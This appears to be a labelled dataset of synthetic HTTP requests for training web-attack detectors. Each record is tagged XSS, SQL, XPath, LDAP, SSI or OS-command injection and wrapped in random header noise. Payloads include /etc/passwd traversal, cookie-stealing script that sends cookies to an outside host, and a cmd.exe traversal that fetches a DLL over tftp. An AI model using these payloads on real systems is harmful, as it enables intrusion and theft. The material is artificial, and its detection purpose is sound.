GET /jTirtkoketihgtonaaie/t-tjZurQtTORC6D_XB.js?mumels7=3&s4ott=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&Eittrs2bx9aotg7=nrm&wncatlGzyW=objecteutd&e43e=6277875654&atone0niscfg=cu&ztdsfEerl9e2i=539&unionbgsoundRo00eval=resfesbed HTTP/1.0
Host: 142.25.192.37
Connection: rmetIqa
Accept: image/*, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, deflate
Accept-Language: *
Cache-Control: ys0es=c
Client-ip: 114.100.144.6
Cookie: gsdp=lvBO5RCIPS;input2xdiv=8440557;aeefytTidndpTr=NvOacceptsa
Cookie2: $Version="483"
Date: Tue, 18 Dec 07 19:43:21 CET
ETag: "1JtsCU7mfRg5csIR4J"
Expect: eeoeO=e3rsdt9
From: 7sEpze@hrhiarN7.de
If-Modified-Since: Sat, 11 Mar 06 19:55:46 GMT
If-Unmodified-Since: Sun, 30 Mar 08 05:58:41 CET
If-Match: *
If-None-Match: "10VRY0GGsC.J-tBl3In"
If-Range: "I_lM8h_X2LcpVp2.CIA"
Max-Forwards: 7640
MIME-Version: 5.5
Pragma: U7awoos=bgnsi
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: Digest uri=/ohyil/aroargkr/gi5s/ifatlbm/wsnitgp.asp
Range: 507970-,9199-
Referer: http://www.tSdu.cz/iRhdes/dltmsI/eOlys/Oiboatat/Wea1oiAe.pl
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/5.1 (compatible; Konqueror/3.9; Unix; Atezs; CLmnh664e; bieodz)
UA-CPU: 68000
UA-OS: Solaris
UA-Pixels: 1458x3720
Via: 8.4 www.erothe.tiff, FTP/5.8 187.183.105.78
Transfer-Encoding: identity
Upgrade: ye1nNS/5.5
Warning: 577 www.vkgsei.gif "nyhteteay" "Wed, 04 Jun 08 24:04:38 UTC"
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36282
Start - Id: 48239
class: XSS
PUT /i5jxiijncu6eitoaL/6Ll/4xZICZF@7llw3HZUz2/wmmr9kedsthaawnaStoh.htm? HTTP/1.1
Content-Length: 245
Content-Language: slnyiab,errrp
Content-Encoding: deflate
Content-Location: http://cueEag.net/1szrin/enrkae7o.tar.gz
Content-MD5: YmFFZXl3bmFTckRkbjNvdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Apr 04 03:22:53 GMT
Last-Modified: Thu, 01 Jul 04 17:58:53 CET
Host: www.XatoilIih.cz:98
Connection: keep-alive
Accept: image/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a6-aei;q=0.5, einsGo-mepaeIFy, mz-te2rajnn;q=0.1, 7pe-tss9
Cache-Control: no-store
Client-ip: 64.5.122.208
Cookie: ue8uncOg0nvae=d8sn;ic2lr=e;UKclnhae2;oeeontumhEhB=<![CDATA[<!--]]    ><script  >[document.location.replace   ('http://www.enri.com/cgi-bin/anertres.cgi'+document.cookie);]//--></script>;lnxtenrn=fes
Cookie2: $Version="0"
Date: Tue, 10 Oct 06 16:27:57 CET
ETag: "XPQO-cQflVc4ZNPDJSK"
Expect: 100-continue
From: oowkt3et@ea9hioiot.be
If-Modified-Since: Fri, 02 Mar 07 18:53:43 UTC
If-Unmodified-Since: Wed, 01 Mar 06 11:42:49 GMT
If-Match: *
If-None-Match: "XKqWwOB@a97BpuJ"
If-Range: Fri, 11 Mar 05 03:34:13 GMT
Max-Forwards: 069
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWkxdGFUemhFZ29lb3ZqODlnc2k3V2NCc3dhc1hzQ2x0Y0hpdFl1cg==
Authorization: Digest opaque="ceTau"
Range: -2
Referer: http://letsin3.com/nsonhwn/iessons/04m3r8rd/tsdtsntr/rAenm.asp
TE: chunked,trailers
Trailer: Warning
User-Agent: necped (pOiCmwG; sfz9@ohH; oekRs7t)
UA-CPU: StrongARM
UA-Disp: 0382,578,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 582x431
Via: 9.1 www.ahwiqlO.gif, rxe/8.7 239.216.62.207:644, HTTP/4.0 111.195.3.87
Transfer-Encoding: gzip
Upgrade: Sey0ci/4.4, t8koji/2.5, aosy/4.1
Warning: 240 84.21.57.161 "irioudpAgtrdiY" 
X-Serial-Number: 793433345048
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.7@w=4488312&tre6seciLq=aewn&bi5uun9e3jt7=9547&T5hEP.A=469&EOayNaoyt=aba8t|iks61e&se0e=etcr1si&8xnRerysys=xmlreplacedNeval&zyJa4.IopenE.RN=ot&RjSCUbgsound=:51egpasswdo&DeehzdtN=72306&ngntdaio=p3Ubgbaodcnke&ibmhih3f=6185591&stieyeo=2071898198

End - Id: 48239
Start - Id: 48602
class: XPathInjection
PUT /enoear7i2ain/sbuo/a9FBwyBKcZ.BU.gtgBE/BUkUh/gwp-y/llu/enmcm0r4hpjfer/mw6/clI7TY9UI9ur8Kiw.bin? HTTP/1.0
Content-Length: 169
Content-Language: tle7,navng
Content-Encoding: deflate
Content-Location: http://www.missA.ch/IsEDraee/seiiaiss/sna0.asmx
Content-MD5: dHZycnloTGVuc2VuYTJ0eQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Aug 09 16:00:58 UTC
Last-Modified: Thu, 26 Feb 09 21:59:10 CET
Host: www.uetol8s6.fr
Connection: close
Accept: image/*, image/jpeg;q=0.1
Accept-Charset: x-mac-greek;q=0.9, euc-cn, x-mac-greek, utf-7
Accept-Encoding: gzip, gzip;q=0.9, compress;q=0.7, gzip
Accept-Language: *
Cache-Control: td3o9ga=zomenoo
Client-ip: 58.151.109.14
Cookie: iniaih=1;C5XPn2.=364953572;Sdoc9i2d=efadmintp;ayzrAtd=0462314207
Cookie2: $Version="357"
Date: Fri, 20 Feb 04 16:17:16 CET
ETag: W/"8nwUpGX1@vrk.uB0bqTM"
Expect: 100-continue
From: aUfef@ct1nr.cz
If-Modified-Since: Mon, 03 Jan 05 21:47:28 CET
If-Unmodified-Since: Sat, 12 Aug 06 13:26:38 UTC
If-Match: "Mm83On1z6kdrQw3g0D"
If-None-Match: "iWTwWoQsVMvsBqR3"
If-Range: "eK7x7COBp1sq9sCZ"
Max-Forwards: 3051
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic TWx1Zzpic3JvZWg=
Authorization: 4diei hihre=ede5gO5
Range: 3-574
Referer: /CrcSsteo/Ntj6n.pdf
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: Mozilla/9.9 (X11; U; Open BSD i586 4.2; w1-ff; rv:0.5.7) Gecko/54810742
UA-CPU: Sparc
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 853x5228
Via: 8.9 www.4fItt.css, sAtsno/0.6 www.tSy5m2.shtml:516
Transfer-Encoding: tFultt
Upgrade: nosb/0.4, m6epm/3.8, n3lo/2.7
Warning: 711 www.2azi1lut.css "nhuTpph3osOgtutn" "Sun, 02 Nov 08 07:06:07 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 4557952
----: ----------------------------------
~~~~~: ~~~~~~~~~~

tcy0wLnt7sw=lTWFH@dvrU&zUEX8MFk=htaccesonDonin gcxml&opi49=ornIhtaccespca&pzu=t8yb']    | P   | //user[  name/text( )  ='aY&9F-2hztNJkA=zazntrd

End - Id: 48602
Start - Id: 49820
class: XPathInjection
GET /s6wt3n28o0igul/6fHGBNlxfk8H_X-r96Ka/ypt80invaoSeii/xh5gbPLHRNiUr@DI.R/oIpyp/v3/4F8TeZm4/TexecJNa/c7jIeq1O/kiitqetdir/iRQF7PAVd9DDz1hxNGhE/d1suampoCSesan.sh?pe=niillDliyewiw&fqtarn=sl8fhavingnshutdownmnpa%2F2oeh+q%2B%3A&tfecbtgqcdoeki=Re%3C&0Os7hhnvqcdnlrv=6ahscxs%27++++or++++6++%3C+++count%28path%2Fchild%3A%3A*%29+++++or+++++%27peityat%27%3D+++%27&slj=rNRZ&Od=nFoMF&aHioerlhwb8sg=aft1l&NdhbblieOi7r=ithd5ermvhTh&rolaiind=tt&xanlenl7ohee9=eD7mwe&mWvM=21041&uumeanuwsny=x0%3Ch3t&vatarHt=mrc HTTP/1.1
Host: 185.43.244.112
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 146.50.160.76
Cookie: tieneslhdpf=ee9E6AUbeac;oasn=wesein;1eLetiea=3li
Cookie2: $Version="9"
Date: Wed, 13 May 09 02:05:58 CET
ETag: "zy_qieYB8jV9UgdeU3V"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Tue, 01 Feb 05 04:39:17 UTC
If-Unmodified-Since: Sat, 18 Dec 04 11:43:13 GMT
If-Match: "61Me-zYyR-KuTQyv_"
If-None-Match: *
If-Range: Wed, 04 Oct 06 13:12:19 UTC
Max-Forwards: 412
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZVJhcnJsQTppc3Blbw==
Authorization: tieT iapre=tartt
Range: 929-812,-37,2-
Referer: /ebnqnt.dll
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/6.8 (X11; U; Unix 4.1; sy-e1; rv:2.2.2) Gecko/73262240
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/7.0 www.hoeodieh.js
Transfer-Encoding: compress
Upgrade: cwreu/9.4
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 233.168.85.19
X-Serial-Number: 684744620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49820
Start - Id: 35088
class: SqlInjection
GET /MRRcGP0.gif?idihy9yelxi6p=hh&5h7tiadtoijm=116075&7lauC=4748452&eueobEuwas2q=iieastylewh&onreEHwRaoj9=91887582&atr51hnHgldtsta=i&servicesopenwginputUT4-bCb=icte HTTP/1.0
Host: 151.127.240.113
Connection: saqthtic
Accept: */*;q=0.5
Accept-Charset: utf-8, iso-8859-3, cp-932;q=0.8, koi8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: A='benb'
Client-ip: 134.67.218.89
Cookie: dHaWaotaolahlsC=02279;fea28O=ia;boot.inimailrZ=25731673;QlogaV3o=dwreuO;rtisT6aeenu=lgipeaprocessing-instructiondl Rde
Cookie2: $Version="6"
Date: Wed, 03 Oct 07 19:37:21 CET
ETag: "lhhbnWrQchRflpNLMz"
Expect: 100-continue
If-Unmodified-Since: Thu, 31 May 07 13:47:42 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 070
Pragma: no-cache
Proxy-Authorization: NTLM aTZ0cnJ1cmtlaTNpdG5lZHlobm5kbzlJdzQyYWloYWRvYW91YWVpZG5oczNhdA==
Authorization: NTLM QWVhdWVoc25kcGVhYXJ5ZHN0ZHRwOWV6ZW0zYXRhbm9pYWxzZXRh
Referer: http://ulteftlh.de/3gie/uaqfHn/eA7aem13/vthag1sh.mspx
Trailer: TE
User-Agent: '   +    (  SELECT    TOP  1    5vI    FROM     clhgmo)  +    '
Via: 5.1 174.114.192.147, HTTP/6.7 www.ynntihoa.jpg, zya/5.7 103.209.252.191
Transfer-Encoding: gtzAa1
X-Serial-Number: 290003
----: --------------------------------

null

End - Id: 35088
Start - Id: 43912
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.1
Host: 226.132.186.103
Connection: keep-alive
Accept: text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 98.12.235.205
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="44"
Date: Wed, 22 Nov 06 03:11:46 GMT
ETag: "m.Xsix2eYp_WcagM1-r"
Expect: slnliT
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Mon, 30 Jun 08 24:48:55 GMT
If-Unmodified-Since: Mon, 12 Nov 07 07:32:09 CET
If-Match: *
If-None-Match: "s_elzsq_CrI0TpYbO"
If-Range: Fri, 18 Sep 09 03:00:29 GMT
Max-Forwards: 4941
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: jaier uicSij=Hxcaxs
Range: 6652-,-36477,66590-93
Referer: /tjsHNt.tiff
TE: trailers,chunked;q=0.3
Trailer: Upgrade
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 5.2; mi-lh; rv:5.5.8) Gecko/92852132
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: HTTP/4.0 50.133.50.36
Transfer-Encoding: compress
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 501 123.151.211.66 "eDet3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43912
Start - Id: 49775
class: XPathInjection
GET /rd1TEqGvZj.Q4aXdl5hb/kOFAtwwqoMv3/i5Xy@Xi3_yVFIhwV4P7/Kca/eSKPLtQzGdHiaABr/nHj_rS.cgi?fo05ae1ma=tnaDg%27%5D++%7C+P+%7C++%2F%2Fuser%5B+name%2Ftext%28++%29+++%3D+++%27lur&6T@2HDKC_dV8=nr&urehcame=7438852&9FJQ8UC=sqebAe HTTP/1.0
Host: 242.114.37.230
Connection: close
Accept: text/xml;q=0.9, image/*;q=0.3, audio/x-wav;q=0.6
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ueYsy-waenh;q=0.8, o-e;q=0.2, luda-anrEauae, l6-aenisa
Cache-Control: no-cache
Client-ip: 253.1.218.202
Cookie: oeoieonrmpEi=oiCdhleusrmfiphpboot.inien;3dz-435KV=r9aBntOjeirh;betA3=bodytuN;eOpucgdtaemit=dk~;Teegoieb=5142534
Cookie2: $Version="2"
Date: Sat, 15 Sep 07 04:34:26 GMT
ETag: "1nP4Bu6v9ApZYEoCkX5p"
Expect: iedo=iysauhb
From: oeeybh7n@salnzlo.de
If-Modified-Since: Thu, 19 Mar 09 04:49:38 CET
If-Unmodified-Since: Sat, 10 Sep 05 09:40:17 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8532
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: oehb ranln=fcmedrne
Range: -43159,7-
Referer: /nytetmTi/toebm.tiff
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: 1V@DVBvKg6 http://www.seElC6ta.de
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3095x7377
Via: 4.7 www.9ape.gif
Transfer-Encoding: gzip
Upgrade: isn/7.4, skmojq/8.7, srajau/4.8, osil/1.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49775
Start - Id: 47379
class: XSS
GET /cun6y3RegiYhhRtnmY.dll?tnrqhkimcfiEm=4z&yiKlnTrslE=097551&YedmflF2ih=msoo63Iemeo&xqM_.Ks4za=aKe&arnR=%3Cxml+++id+%3D+++%22+++++X++++%22++++%3E%3Ca++++%3E%3Cb++++%3E%26lt%3Bscript++++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.li.com%2Fcgi-bin%2Fmaniicniel.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript++++%3E%3B%3C%2Fb++%3E%3C%2Fa++%3E%3C%2Fxml++%3E&nofdWn2ei77ie=G&dTmra=612&yonaaf=90655274&Oy0nwsxbchR=ygop HTTP/1.1
Host: www.atcisvor.de:0405
Connection: close
Accept: image/*;q=0.1
Accept-Charset: iso-8859-5
Accept-Encoding: *
Accept-Language: *
Cache-Control: t=a
Client-ip: 246.85.69.97
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="46"
Date: Sun, 23 Aug 09 06:36:36 CET
ETag: W/"eK9JG65XxM2Bk-Ko"
Expect: 7xxmj=O1mtSo
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Sat, 22 May 04 13:12:25 UTC
If-Unmodified-Since: Sat, 06 Mar 10 12:31:08 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 74
MIME-Version: 2.6
Pragma: mdakaru='ieeebrt'
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: i3oce fsle=teaqnic
Range: 35419-,75138-2674,165640-
Referer: /fnehn/eseR/Sod2eis/ei4oj3qs.tar.gz
TE: trailers,deflate;q=0.9
Trailer: Expect
User-Agent: hY1FiR http://www.egtted9n.biz
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 9.4 134.100.224.172:21, 3.5 www.58oM.css, 8.6 www.emwieaLS.shtml
Transfer-Encoding: gzip
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 045 www.7ot6v.tiff:40 "9ew6nQffbtqNaolon" 
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 167101888
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47379
Start - Id: 37973
class: LdapInjection
GET /rODZ42/ta0leo7yvesatndl/qctoafp/aa3sioMHjzdb.swf?aotidn=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&4yalruktl=9807&iostjtwuoloe=uaEiA4x HTTP/1.0
Host: 85.101.221.153
Connection: close
Accept: text/*, text/xml
Accept-Charset: windows-1254;q=0.5, us-ascii;q=0.3, x-mac-greek;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=16
Client-ip: 212.223.27.223
Cookie: ifeealea7nnR=stylee
Cookie2: $Version="343"
Date: Tue, 04 Dec 07 12:31:40 CET
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 01 May 08 22:33:41 UTC
If-Unmodified-Since: Tue, 13 Jan 04 04:26:08 UTC
If-Match: "P1JaL2eeABd8mb.NnlEG"
If-None-Match: *
If-Range: "LZEhfgPNFK3uizGD"
Max-Forwards: 2
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: im4o0 xt8ceo3a=mTmhl
Range: -8,482604-
Referer: http://Snhx.st/eeok/4egSxt2r/HhOn/tautq/wst5sdtr.php
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: boeN (rCUxITD; 9KTadwb5; sDODC8xjC)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8848x2681
Via: 4.3 125.101.210.132
Transfer-Encoding: tNlu
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37973
Start - Id: 39503
class: SSI
GET /c3ncunnie9oharjdlwo/imijtsodynbIiaefrfj/huouiu/6eoefHerIieemeid1n.bin?deqn5taxkcs=8m&iageseisn=qedtcn&Gjpshutdownsock_stream=563&sCrF2d@AV@=3072&neritduTc2p=%3FtekobniIArfe%26q&tuereNau6h=sers8eTuhi&yCncIAz4c=4rptgean&na1a4eDatreo=C2inputdec7sbeC&tetelnetOm=e&cioaihxk2rdoenT=0885165&nra6drEserod=s&c5htaccesyTD=sYvySU4d&T2lPuhmSaPbX=9e HTTP/1.1
Host: 90.33.246.236
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=84119
Client-ip: 17.157.96.204
Cookie: q0etalkr=ga@A7GK;n4fe8ya=i;nbn2jnadwj4;ose=omArqjfje3;upTrqIs=94548411;eenucs0tizT=sJfCu@SQtn
Cookie2: $Version="1"
Date: Tue, 31 Mar 09 10:27:32 UTC
ETag: W/"WZNJPRVhwKs5WbH1Gdm"
Expect: 100-continue
From: el2u@0la399.com
If-Modified-Since: Wed, 10 Mar 10 13:57:50 CET
If-Unmodified-Since: Thu, 27 Dec 07 20:27:16 CET
If-Match: "NZeBIhMyKWTlBIeZd3q"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: 6eesqI biis=qhv8oi65
Authorization: NTLM OElyZGhuTmFlck5laXlpNmlmMmt0ZTZtYUViZHhlQ3RpcERhYQ==
Referer: /5ejPdjaO/k4itea/ar02u.jpg
TE: gzip;q=0.1
Trailer: Expect
User-Agent: <!--     #include  virtual="/etc/passwd"  -->
UA-CPU: Sparc
UA-OS: Linux
UA-Color: color16
UA-Pixels: 296x5456
Via: HTTP/9.5 82.239.53.239:0, 8.9 251.218.108.166
Transfer-Encoding: bavrx
Warning: 903 11.205.255.14:699 "aie8fmms" "Sun, 25 Oct 09 02:11:26 CET"
X-Forwarded-For: 212.30.157.133
X-Serial-Number: 81323854011
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39503
Start - Id: 42978
class: OsCommanding
GET /A024sUrn9Xupdatea/uTsa3t6wtrggo/daaiI/sejhlynseeai0nRegun/hDesystemKu/6rAvFnON6S6VCHJqoPxd/samhyaP-UbrscriptbinY/O4L/4OidSotallsa4o/eeTxur5o.nsf?dthspOheOtOd=aqOjA&d2pca19=73&zFvarCHEacceptCobject=eraye&sjeE5zv5tA=mn&L-phpAPnL8=eJ7iEEUGRf.&resro7ttih=opr+alTfrr8nqHperlE-teT&rFeHdeu=07&mjnaq=48552619 HTTP/1.1
Host: 138.90.250.241:80
Connection: close
Accept: text/*, text/xml
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, identity, gzip, deflate;q=0.5
Accept-Language: t-encjnnxE, aliltchw-ondr
Cache-Control: only-if-cached
Client-ip: 244.115.247.181
Cookie: domnlctmT=/../../../../../../../bin/cat     /etc/passwd |;dgrzanVnlz=szb1;Pyfe=positionerf;rtri1=mOhbq1Hnz;tcnoe860hosyn8=x1Iswwyneozem;1l=i6gzgw
Cookie2: $Version="1"
Date: Tue, 20 Jan 09 10:21:12 GMT
ETag: "j-fPw5VJJMXmC7u8kvpN"
Expect: 100-continue
From: sm08@jfpodS0in.de
If-Modified-Since: Fri, 14 Mar 08 20:45:11 CET
If-Unmodified-Since: Mon, 06 Sep 04 18:30:48 UTC
If-Match: "zykmjHHm5orq_AY"
If-None-Match: "Q@qTAh0@kBJxUF3Prt"
If-Range: *
Max-Forwards: 374
MIME-Version: 5.3
Pragma: stveh=aodvs
Proxy-Authorization: Efle esuaEdos=0iega
Authorization: Basic ZTBzcTo0aWhzdA==
Range: 0997-5536,919-049042
Referer: http://www.neoeEugt.net/aDe0fo/hewTurb/t7eokE.tar
TE: trailers,trailers,deflate;q=0.6
Trailer: Accept-Encoding
User-Agent: Mozilla/1.3 (compatible; Konqueror/5.7; SunOS sun4u; tvaeSa)
UA-CPU: x86
UA-Disp: 2237,4144,16
UA-OS: Win95
UA-Color: color32
Via: 5.6 www.httfee6s.css:4
Transfer-Encoding: gzip
Upgrade: els/1.7, ybhtR/9.9, atrt/9.3, DyeUc/4.4
Warning: 673 www.9eenjn.js "rqcl1aHHl" 
X-Forwarded-For: 235.151.239.155
----: ------------------------

null

End - Id: 42978
Start - Id: 40588
class: SSI
GET /MtX1qqbmI22U-W/ajrZ/Esreke7/teoglCal/lB45w/Ri/intAZ43Daccess_logKOLzmp/nhth/hWOflPccW-vtsw9qje/lnoeaaamos5/3dB.mdb?2Ai=x6sCW&9tTrIhcubn9a=sraosicnnhiaeih5&Ead=3419822&kC6VVPN5D6OM=0501131&fnF=hht0&h6l=775&tea6itelqbdT=%3C%21--+++++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&dp=adpte&varJ_l=srn&sL4h=06285098&neTsoddhetn=hz1%3Atnrt8nexts&tt5tteM4Fppse=33 HTTP/1.0
Host: www.rEgt.ch
Connection: keep-alive
Accept: text/html;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale=36
Client-ip: 25.93.112.146
Cookie: 8a1ores=259336813;aeUe=280;h4ifces=oihtaccesh;mgttenwN=08;ylshagdm=zbncawonastt;mtmtmi=72
Cookie2: $Version="623"
Date: Mon, 02 Apr 07 11:41:29 GMT
ETag: W/"@QW.R5v1eWXxLHLUf1Ll"
Expect: 100-continue
From: tiotlhOg@Ee0em4sr8.gov
If-Modified-Since: Fri, 05 Mar 04 01:59:03 GMT
If-Unmodified-Since: Thu, 31 Jul 08 14:54:06 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Dec 06 14:51:29 GMT
Max-Forwards: 36
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM YWhlYXFlbmhuY2U4aHlhdGxOZWk1ZGVtdG91QTVsMXJycWVtZWRmZTFoNG9sTnI=
Authorization: NTLM aWF6cjJyb2VzMHp1b2VsamNob29zdnRwdXl0dG9sbHRzQWJxbzhUUGtFdGk=
Range: 9102-264,3606-,-14
Referer: /jDdoir.wav
TE: gzip;q=0.3,gzip;q=0.4,gzip;q=0.2
Trailer: If-Range
User-Agent: Mozilla/0.3 (Windows; U; Win98 7.7; ne-pl; rv:0.7.1) Gecko/28359045
UA-CPU: StrongARM
UA-Disp: 2015,473,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 972x7445
Via: FTP/6.4 55.207.231.13, ex2r6/2.9 136.83.100.0, HTTP/4.1 1.91.195.76
Transfer-Encoding: compress
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 737 www.suaxgW.shtml "9arerm" 
X-Forwarded-For: 163.253.181.70
X-Serial-Number: 69115
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40588
Start - Id: 48812
class: XPathInjection
GET /Ecrnrtr/Teuay/fCTOc5.xF0nddvy@d/wae0ndo/nue6o/1IwLOhB1xA1s/to59nRz_b.N4omLb_DN.shtml?CoefAnc7hEom=oYh1+eineeo&pAhm4sdpqifr=ebscripth%40mF&5hegfcn=rnh%27++++or++1%3C++++Woae%2Fetweis%2Ft%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D01%5D+++++or+++++%27hecys%27++%3D%27&u0rl5r=la+ HTTP/1.0
Host: 186.88.160.230
Connection: keep-alive
Accept: video/*;q=0.5, application/*;q=0.3, application/*;q=0.5
Accept-Charset: koi8;q=0.3, cp-936
Accept-Encoding: compress;q=0.9, compress;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 5.230.196.145
Cookie: jRrAjU=t4ewdderrrar;o4=dati3uxcrsoa
Cookie2: $Version="7"
Date: Tue, 28 Sep 04 03:13:03 GMT
ETag: W/"6WLOop_Whk@w0uCW8DO"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Sat, 29 Aug 09 23:20:12 UTC
If-Unmodified-Since: Sat, 18 Sep 04 19:39:02 UTC
If-Match: "nvJe5tJjZu8kf7VKDA5W"
If-None-Match: "o@a@6..Kgx04Ue3"
If-Range: *
Max-Forwards: 7413
MIME-Version: 7.6
Pragma: ofw=eRvn
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: Basic bVAzNmxPOmxsaWVz
Range: 5889-260241,53147-,8-96
Referer: /smeh/s9me/ih39kq/sroEjs.gz
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: lnwisTu
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: aimtj/3.9, eeTl/5.5, Otocrt/9.5
Warning: 095 48.11.160.104 "zathsTosotrtckdn" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 9894674694471428
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48812
Start - Id: 42513
class: SqlInjection
GET /s50bbrBxpwpCTFIdn2/nwmwna.css?n1tisye7e4ite0=yperleiqrlyoc&rel=or++++0%3C%3E%28select++count%28*%29+from+++1eA1%29 HTTP/1.0
Host: www.neAb3urbtd.it
Connection: Kuira
Accept: */*;q=0.6
Accept-Charset: *;q=0.3
